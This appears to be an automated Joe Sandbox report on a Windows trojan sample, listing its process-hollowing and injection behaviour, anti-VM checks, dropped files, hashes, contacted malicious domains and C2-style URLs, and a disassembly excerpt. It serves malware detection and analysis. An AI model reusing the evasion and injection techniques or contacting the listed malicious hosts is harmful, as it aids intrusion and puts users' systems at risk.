          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 383851 | Sample: AQJEKNHnWK.exe | Startdate: 08/04/2021 | Architecture: WINDOWS | Score: 100
          Start (node 2): DNS/IP: www.thelitigatorsbookclub.com; www.jjwheelerphotography.com; 4 other IPs or domains. Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures. Started: AQJEKNHnWK.exe (node 11).
          AQJEKNHnWK.exe 18 (node 11): Dropped file: C:\Users\user\AppData\...\bdww7k1w8bk0.dll, PE32. Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging. Started: AQJEKNHnWK.exe (node 15).
          AQJEKNHnWK.exe (node 15): Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection). Injected: explorer.exe (node 18).
          explorer.exe (node 18): DNS/IP: www.formula-kuhni.com 91.236.136.12, 80, WEBHOST1-ASRU, Russian Federation; www.tonton-koubou.com 163.44.185.226, 49727, 80, INTERQGMOInternetIncJP, Japan; 9 other IPs or domains. Signatures: System process connects to network (likely due to code injection or exploit). Started: explorer.exe (node 22).
          explorer.exe 12 (node 22): DNS/IP: www.formula-kuhni.com. Signatures: System process connects to network (likely due to code injection or exploit); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements. Started: cmd.exe (node 26).
          cmd.exe 1 (node 26): Started: conhost.exe (node 28).

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          AQJEKNHnWK.exe | 19% | Virustotal |
          AQJEKNHnWK.exe | 35% | ReversingLabs | Win32.Trojan.Wacatac

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll | 21% | ReversingLabs | Win32.Trojan.Wacatac

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.2.explorer.exe.2d564d0.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
          7.2.explorer.exe.4e47960.6.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.2.AQJEKNHnWK.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.AQJEKNHnWK.exe.740d0000.5.unpack | 100% | Avira | HEUR/AGEN.1131513
          7.2.explorer.exe.8c0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.2.AQJEKNHnWK.exe.26c0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.1.AQJEKNHnWK.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.AQJEKNHnWK.exe.1eef0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.mywinnersworld.com/hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD | 0% | Avira URL Cloud | safe
          http://www.tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD | 0% | Avira URL Cloud | safe
          http://www.formula-kuhni.com/eIm# | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://julianlawoffices.law/hx3a/?tZUT=Iu/IXyUbTVDu5P2JH19Ubbm/NNayCdBr7HPQNpzBLmA | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          www.th0rgramm.com/hx3a/ | 0% | Avira URL Cloud | safe
          http://www.phillhutt.com/hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD | 0% | Avira URL Cloud | safe
          http://tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.formula-kuhni.com/hx3a/?tZUT=caEAE6TOQuxSMBR5BS8nf | 0% | Avira URL Cloud | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.tonton-koubou.com | 163.44.185.226 | true | true | | unknown
          www.mywinnersworld.com | 67.205.188.68 | true | true | | unknown
          jjwheelerphotography.com | 192.0.78.24 | true | true | | unknown
          www.formula-kuhni.com | 91.236.136.12 | true | true | | unknown
          www.phillhutt.com | 103.97.19.74 | true | true | | unknown
          shops.myshopify.com | 23.227.38.74 | true | true | | unknown
          apettelp.club | 95.215.210.10 | true | true | | unknown
          thelitigatorsbookclub.com | 184.168.131.241 | true | true | | unknown
          www.th0rgramm.com | unknown | unknown | true | | unknown
          www.hatikuturkila.com | unknown | unknown | true | | unknown
          www.jjwheelerphotography.com | unknown | unknown | true | | unknown
          www.thelitigatorsbookclub.com | unknown | unknown | true | | unknown
          www.rainbowsdepot.com | unknown | unknown | true | | unknown
          www.gracieleesgiftsandmore.com | unknown | unknown | true | | unknown
          www.apettelp.club | unknown | unknown | true | | unknown
          www.ezmodafinil.com | unknown | unknown | true | | unknown
          www.orgoneartist.com | unknown | unknown | true | | unknown

                                            Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD | true | Avira URL Cloud: safe | unknown
          http://www.mywinnersworld.com/hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD | true | Avira URL Cloud: safe | unknown
          http://www.tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD | true | Avira URL Cloud: safe | unknown
          www.th0rgramm.com/hx3a/ | true | Avira URL Cloud: safe | low
          http://www.phillhutt.com/hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD | true | Avira URL Cloud: safe | unknown

                                            URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.formula-kuhni.com/eIm# | explorer.exe, 00000007.00000002.472073266.0000000002DBC000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.tiro.com | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://julianlawoffices.law/hx3a/?tZUT=Iu/IXyUbTVDu5P2JH19Ubbm/NNayCdBr7HPQNpzBLmA | explorer.exe, 00000007.00000002.474718381.0000000004FC2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.carterandcone.coml | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://www.typography.netD | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://fontfabrik.com | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false | | high
          http://tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF | explorer.exe, 00000007.00000002.474718381.0000000004FC2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp | false
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.formula-kuhni.com/hx3a/?tZUT=caEAE6TOQuxSMBR5BS8nfexplorer.exe, 00000007.00000002.472169147.0000000002DCF000.00000004.00000020.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fonts.comexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sakkal.comexplorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown

Contacted IPs

Public

IP               Domain                    Country               ASN       ASN Name                                 Malicious
163.44.185.226   www.tonton-koubou.com     Japan                 7506      INTERQ GMO Internet Inc JP               true
103.97.19.74     www.phillhutt.com         China                 134548    DXTL-HK DXTL Tseung Kwan O Service HK    true
91.236.136.12    www.formula-kuhni.com     Russian Federation    44094     WEBHOST1-AS RU                           true
23.227.38.74     shops.myshopify.com       Canada                13335     CLOUDFLARENET US                         true
67.205.188.68    www.mywinnersworld.com    United States         14061     DIGITALOCEAN-ASN US                      true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383851
Start date: 08.04.2021
Start time: 11:05:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 1s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: AQJEKNHnWK.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@14/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 22.8% (good quality ratio 20.6%)
• Quality average: 73.5%
• Quality standard deviation: 31.4%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 23.54.113.53, 104.42.151.234, 95.100.54.203, 20.50.102.62, 93.184.221.240, 23.10.249.26, 23.10.249.43, 20.54.26.129, 20.82.210.154
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs


                                                                Domains


                                                                ASN

                                                                • 45.192.251.43
                                                                QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                • 156.239.96.43
                                                                Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                • 45.194.211.92
                                                                proforma.exeGet hashmaliciousBrowse
                                                                • 154.219.105.199
                                                                xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                                                • 154.80.163.105
                                                                oQJT5eueEX.exeGet hashmaliciousBrowse
                                                                • 154.214.73.24
                                                                MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                • 156.232.242.149
                                                                New Order.xlsxGet hashmaliciousBrowse
                                                                • 156.239.96.50
                                                                SWIFT001_jpg.exeGet hashmaliciousBrowse
                                                                • 175.29.36.135

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll | Updated SOA.xlsx | malicious

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll
Process: C:\Users\user\Desktop\AQJEKNHnWK.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5120
Entropy (8bit): 4.157754423334291
Encrypted: false
SSDEEP: 48:St0ZBd/kqM1b5PHhqu8MUEm17OGa4zzBvoAXAdUMQ9BgqRuqS:ld/kfyZUGXHBgVueKx
MD5: 7C0BF830FA76E4A4D540EF51EC685997
SHA1: 00240D0CBD420B9B54F7795E15D1F6E92AE9D2DB
SHA-256: 6C4628D2A5D9FE67953D21A7AB0FF49BAC94B69FB32B5A1FA94AE8CB71A4D693
SHA-512: 95AE291760A5AC7F1CC72F7E40387A8E8BCBAFC262F021508D76DAAB0C1CB152C4EE518F156BF44F73014F8292A352E0EA509B3F88787A381F226E303E02E89C
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 21%
Joe Sandbox View:
• Filename: Updated SOA.xlsx, Detection: malicious
Reputation: low
C:\Users\user\AppData\Local\Temp\s1min5obsmh
Process: C:\Users\user\Desktop\AQJEKNHnWK.exe
File Type: data
Category: dropped
Size (bytes): 6661
Entropy (8bit): 7.971988981636967
Encrypted: false
SSDEEP: 96:ifIF/0cOvEQzFlnfCS7hoJiYv93UtnfYuxXyEphUzLrxFOrNkdHdFF2wy+jYPdlP:fpF6pzFB8XvwtfKZFzPF01PziTs
MD5: EF56F8767AF49E69DA53598A8DD3FE95
SHA1: 04B3DD6AE4653A9D9191081901D531B5EA35465A
SHA-256: B5524B63170C43392C14F0E6CF7E284345C7DDF3BCB5096F23B69AE40B786E9C
SHA-512: FA9443B99CBB0B3F42E567D5CDA9A1D7760EE93E9A4186CFDF0B96F3C8B807DBBDA1AD1FD0C9A8D65065C78D841002A8D5255A963AB9BFAAE8E75E5E36827B7D
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Temp\z48eaiospth
Process: C:\Users\user\Desktop\AQJEKNHnWK.exe
File Type: data
Category: dropped
Size (bytes): 164864
Entropy (8bit): 7.998870102830855
Encrypted: true
SSDEEP: 3072:kZaUuXIqUKJjdQ4MuD+gw2NkXhf8HNGLvQlrG3BoPg3yjw57f2p1XQMpyb:gaTXIqU2QADiwk+ovQliaIO1Lp4
MD5: 30FA9FE5A45263CC2DAD1E49C0B514EE
SHA1: B485A73189B8B69E11D6A998FEC0D02ECD97085D
SHA-256: 460BED5F9F6B0D5E2B70BF57AF995E72CDDFADED4CB666D6D0258EFD3BA1C91C
SHA-512: FCAF0498F03D6EAFD0E802591D08635CD271A8CF97747FE1371B7C1A887294F1443F8408B1D28E64E981CE7CBCF62DA801376078C6FA3B2C3776D554D9B44C97
Malicious: false
Reputation: low

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.466305160327421
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: AQJEKNHnWK.exe
File size: 371388
MD5: 5d8702803555ff684424ebd13eda9f47
SHA1: f8b1197457782ba958fc7178fb838119c8138374
SHA256: f7e96b7c6612b709e413bbc8c72796cadbb7ce91ed17ec77d5ba4d4422e729cb
SHA512: 45b4c4536c3cbb95ca5a93e721fff7e197bd27558f1646bdbdde42db62786cf6d323f056556b05fd4ee6b7806971492e9683a99f17481ce8c1649d872d6b55d9
SSDEEP: 6144:ndQzbPzOFZni219PFibpbvnl6gTaTXIqU2QADiwk+ovQliaIO1Lpt:k+dONwqYfDiwk+ooli6Vb

File Icon

Icon Hash: 0cbeb1368b82a600

Static PE Info

General

Entrypoint: 0x40314a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 18bc6fa81e19f21156316b1ae696ed6b

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  sub esp, 0000017Ch
                                                                  push ebx
                                                                  push ebp
                                                                  push esi
                                                                  xor esi, esi
                                                                  push edi
                                                                  mov dword ptr [esp+18h], esi
                                                                  mov ebp, 00409240h
                                                                  mov byte ptr [esp+10h], 00000020h
                                                                  call dword ptr [00407030h]
                                                                  push esi
                                                                  call dword ptr [00407270h]
                                                                  mov dword ptr [007A3030h], eax
                                                                  push esi
                                                                  lea eax, dword ptr [esp+30h]
                                                                  push 00000160h
                                                                  push eax
                                                                  push esi
                                                                  push 0079E540h
                                                                  call dword ptr [00407158h]
                                                                  push 00409230h
                                                                  push 007A2780h
                                                                  call 00007FC7F0A14AF8h
                                                                  mov ebx, 007AA400h
                                                                  push ebx
                                                                  push 00000400h
                                                                  call dword ptr [004070B4h]
                                                                  call 00007FC7F0A12239h
                                                                  test eax, eax
                                                                  jne 00007FC7F0A122F6h
                                                                  push 000003FBh
                                                                  push ebx
                                                                  call dword ptr [004070B0h]
                                                                  push 00409228h
                                                                  push ebx
                                                                  call 00007FC7F0A14AE3h
                                                                  call 00007FC7F0A12219h
                                                                  test eax, eax
                                                                  je 00007FC7F0A12412h
                                                                  mov edi, 007A9000h
                                                                  push edi
                                                                  call dword ptr [00407140h]
                                                                  call dword ptr [004070ACh]
                                                                  push eax
                                                                  push edi
                                                                  call 00007FC7F0A14AA1h
                                                                  push 00000000h
                                                                  call dword ptr [00407108h]
                                                                  cmp byte ptr [007A9000h], 00000022h
                                                                  mov dword ptr [007A2F80h], eax
                                                                  mov eax, edi
                                                                  jne 00007FC7F0A122DCh
                                                                  mov byte ptr [esp+10h], 00000022h
                                                                  mov eax, 00000001h

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x28bf7 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3ac000 | 0x28bf7 | 0x28c00 | False | 0.550972967791 | data | 6.60623395491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3ac280 | 0xffaa | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_ICON | 0x3bc22c | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x3cca54 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295 | |
RT_ICON | 0x3d0c7c | 0x25a8 | data | |
RT_ICON | 0x3d3224 | 0x10a8 | data | |
RT_ICON | 0x3d42cc | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_DIALOG | 0x3d4734 | 0x100 | data | English | United States
RT_DIALOG | 0x3d4834 | 0x11c | data | English | United States
RT_DIALOG | 0x3d4950 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3d49b0 | 0x5a | data | |
RT_MANIFEST | 0x3d4a0c | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
